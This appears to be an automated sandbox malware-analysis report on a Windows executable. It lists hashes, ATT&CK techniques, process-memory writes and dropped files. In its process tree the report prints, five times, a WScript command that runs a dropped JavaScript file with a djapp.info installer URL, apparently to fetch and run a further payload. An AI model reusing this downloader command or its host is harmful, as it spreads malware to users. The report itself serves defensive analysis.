91a34986c15dc37ac33b15e677f21940d992cf2c31b5af85d9ead18b251ef8a0

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
31-05-2024 09:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe
Size

184KB
MD5

8695849edc287a9761aea3bab6a6feb1
SHA1

83bab866fb8ad5bc85e3024133799ff6d45add46
SHA256

91a34986c15dc37ac33b15e677f21940d992cf2c31b5af85d9ead18b251ef8a0
SHA512

ddb6ccf813f7d7a7f888417569c3fe5e4953ba832b1581231c5016062859292fe4d7c3faf9d98dd0c8987fe2c43c45501c7740ff80404b21d4286cafe30479b2
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3r:/7BSH8zUB+nGESaaRvoB7FJNndnO

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	1812	WScript.exe
8	1812	WScript.exe
10	1812	WScript.exe
12	2756	WScript.exe
13	2756	WScript.exe
16	2568	WScript.exe
17	2568	WScript.exe
19	1584	WScript.exe
20	1584	WScript.exe
22	2088	WScript.exe
23	2088	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2176 wrote to memory of 1812	2176	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	28
PID 2176 wrote to memory of 1812	2176	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	28
PID 2176 wrote to memory of 1812	2176	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	28
PID 2176 wrote to memory of 1812	2176	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	28
PID 2176 wrote to memory of 2756	2176	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	30
PID 2176 wrote to memory of 2756	2176	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	30
PID 2176 wrote to memory of 2756	2176	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	30
PID 2176 wrote to memory of 2756	2176	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	30
PID 2176 wrote to memory of 2568	2176	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	32
PID 2176 wrote to memory of 2568	2176	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	32
PID 2176 wrote to memory of 2568	2176	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	32
PID 2176 wrote to memory of 2568	2176	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	32
PID 2176 wrote to memory of 1584	2176	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	34
PID 2176 wrote to memory of 1584	2176	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	34
PID 2176 wrote to memory of 1584	2176	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	34
PID 2176 wrote to memory of 1584	2176	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	34
PID 2176 wrote to memory of 2088	2176	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	36
PID 2176 wrote to memory of 2088	2176	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	36
PID 2176 wrote to memory of 2088	2176	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	36
PID 2176 wrote to memory of 2088	2176	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2176
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf59C.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf59C.exe
  2⤵
  - Blocklisted process makes network request
  PID:1812
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf59C.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf59C.exe
  2⤵
  - Blocklisted process makes network request
  PID:2756
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf59C.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf59C.exe
  2⤵
  - Blocklisted process makes network request
  PID:2568
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf59C.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf59C.exe
  2⤵
  - Blocklisted process makes network request
  PID:1584
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf59C.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf59C.exe
  2⤵
  - Blocklisted process makes network request
  PID:2088

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
984591c7c475e1fbaa38e7a1107ca546

SHA1
2f5bba5480eea8e0364cf2d2017fc21c1a121e90

SHA256
f4f6f23923a3ac14eb66148d13837d6f134d2691e2ba067aaba13a6747efce0f

SHA512
852574ed4a2bfebeb17039e59508f15dfe17a90cd73dce34b812d33b8bcd2f9e0347b0efb841e5747ecb677cef69f4106781cdf9464175f801ee533cd0a1ae69

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
a4404dc5de435156d45ef8c8353b2bf5

SHA1
c02d63b23a45bc6b3f294eb97b874e663631eb08

SHA256
b67d4086aae92c6fa01181e7a2d843b7f8ff434197b0f0fbe03bdef5347a67e8

SHA512
d5f93f762c9898e43b88e147a0a5514e226f82f9224f1865d1c05fa315b94b5ae664f82fd7930d1e1b1a8a4175acee9302a9b48abe019a90a791087a73ba42bb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
93f594a54ea004a5306cefc557c0ab0d

SHA1
e2ef4c852565aff3b8b0b26f0a610aad85554587

SHA256
da67175f6d92fef93d09f11e092300f011f6f4a84b3f248a1e342e1ea62978a9

SHA512
8b7d572457b9e74b3da462f79142152591a99e6430b301d72aa81134dfd5c42056fa09500f5bec1c3a169e7775d935cd538622604f424b5aa1e5ffb94c2d99d0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
2535f675151b54729f79552416c4a1cc

SHA1
0a130f29c4516981c829a0a5c4112be626c52753

SHA256
f24e9fc06f4b1547315241d32bcb18bd96f85e046861e5eabb8438a7534c4519

SHA512
351de342a7265527a538d20194335072e56523cc9820d44313eb2680d2fbf0e16674744dae27126c86aa57567ba6b7c6f9f7160105d55d7d986b4d6706274bea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\domain_profile[1].htm

Filesize
6KB

MD5
61320fcd004f527184cda90144bdfaf1

SHA1
52f4950916f019c6273346bb0d70483870e7d940

SHA256
abd9d4cd44d70ac1046885082490e28daa6800dec4f8db66978ca132deaec215

SHA512
1b35134daecad1fa337260eb0262c7a240c199af5e2465303a60173a6c70a866ca6d6dff024d9dc9e8e768ed9b1da01e840a1350425bc9327e4352ab8d6f5008

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\domain_profile[1].htm

Filesize
6KB

MD5
6e1f70ef118f481a0d5d9f65c53448ad

SHA1
a54598517e67be20486d7452979f274c0bced41c

SHA256
cd7ad0cf0b93bfedb7e9de7bed5733c6ae8786b4fe4aa394817376ac220fe107

SHA512
3d63a55a75430714c08163540474b553bdd92e8815914ed862fa4cf02a676a5514e2c8fc64857350b41d1548dd9631d2efab6c7a5dfe386bb676092c25a65da0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PH7CXNA3\domain_profile[1].htm

Filesize
6KB

MD5
b451c483059eb0c1c48b789b6f42f9f4

SHA1
ede8052f19a4ce4656e76e1ac01cc7b3dd4c0cb8

SHA256
ccd855025a72dd67317cc8b3653cb8087b5cf12907ddb0b81bd2ba4423c37057

SHA512
5241f6f5549c13da792d7b1b6d8bdd7e76a41330990e2fba2f05eb2e37f772f8e4f071f2b943814cf540a311f5d3c00e7a85bc7c71f46320ef6f629c97dbd0ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PH7CXNA3\domain_profile[1].htm

Filesize
6KB

MD5
0ef01aaf48041ddd67a82e3c50b1be73

SHA1
11f4af6098af33be3215f34aec06f3325b67eee0

SHA256
9f334698a3a983a8d6f513c0eb4c0ebe10a7d89d365fb36d99e4c2d60ca2689e

SHA512
f145e938fcb17817e273adfcfb81c7585cb7f6abbd8948b80289debc3ebbae5a82aaf6cfa577f2097e0e2688510cf33394a0bd512244572fe8114892d7e7b4a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab4CF8.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar65D6.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf59C.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\0V6CG19M.txt

Filesize
175B

MD5
eb0ac2ff3e3431758b6514b799d4af3a

SHA1
147bccbe5e6c5c8dcaccfb8f04dd692738d604d6

SHA256
c85af7ef7dbf8757beffef41dc09dfc4fe94ccdb60906b865b880820afc3e5a4

SHA512
633b1f1da4dee60888d1c252cb5c6068b4b4356c23074a19513c8de94d0dcb7a5614e53c4f10024b270da8ca338f8f70cce861754e5cec0b51104fc64fab5ef4

Download Submit